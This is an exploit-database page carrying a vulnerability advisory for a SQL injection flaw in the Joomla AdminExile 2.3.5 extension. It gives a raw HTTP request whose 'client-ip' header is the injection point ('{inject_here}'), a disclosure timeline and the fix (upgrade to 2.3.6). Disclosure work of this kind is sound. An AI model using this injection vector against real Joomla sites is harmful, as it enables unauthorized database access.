[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla AdminExile 2.3.5 SQL Injection Vulnerability

Author
Ahmad Prayitno
Risk
[
Security Risk High
]
0day-ID
0day-ID-22881
Category
web applications
Date add
16-11-2014
Platform
php
========================
# Exploit Title: Joomla AdminExile 2.3.5 SQL Injection Vulnerability
# Product Version: 2.3.5
# Date: 2013-Nov-17
# Exploit Author: Ahmad Prayitno
# Author Homepage: www.itsecasia.com
# Author Email: ahmad@itsecasia.com
# Vulnerability Type: Sql Injection
# Risk Level: High
# Tested on: Windows/Linux
# Affected Core : Joomla 3.3.x
========================



========================
SQL Injection
========================
Found on  :
http://localhost/joomla/administrator

Request :
GET /joomla/administrator/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
client-ip: {inject_here}
Cookie: dfced3b8ef8245f626640a33bb1d908f=0f7pkv2p1i3vqbp224q9udp9b4; f420729ee91ec3b850baf24c10a348a9=6mooi0kd59lu1dpc3eeda9sff7; e23a0a2534ba85d72ff76b6caaeedf7c=72nm4bhounp9ttl99ek75f86e0; 2b324c8886aa851616c90d9647b79ada=nqagqe3f26uhmmmbcfhgjl9ah4; fddc07f71055812367142b68353bc63e=ei0tq48lao96ht43f1fmu2kr95
Connection: keep-alive

========================



========================
Timeline:
========================
2013-Nov-09 Provided details to vendor/developer
2013-Nov-09 Submit to VEL Joomla
2013-Nov-17 Response from vendor
2013-Nov-17 New version released
2013-Nov-17 Advisory published



========================
Solution :
========================
Upgraded to version 2.3.6

#  0day.today [2024-11-15]  #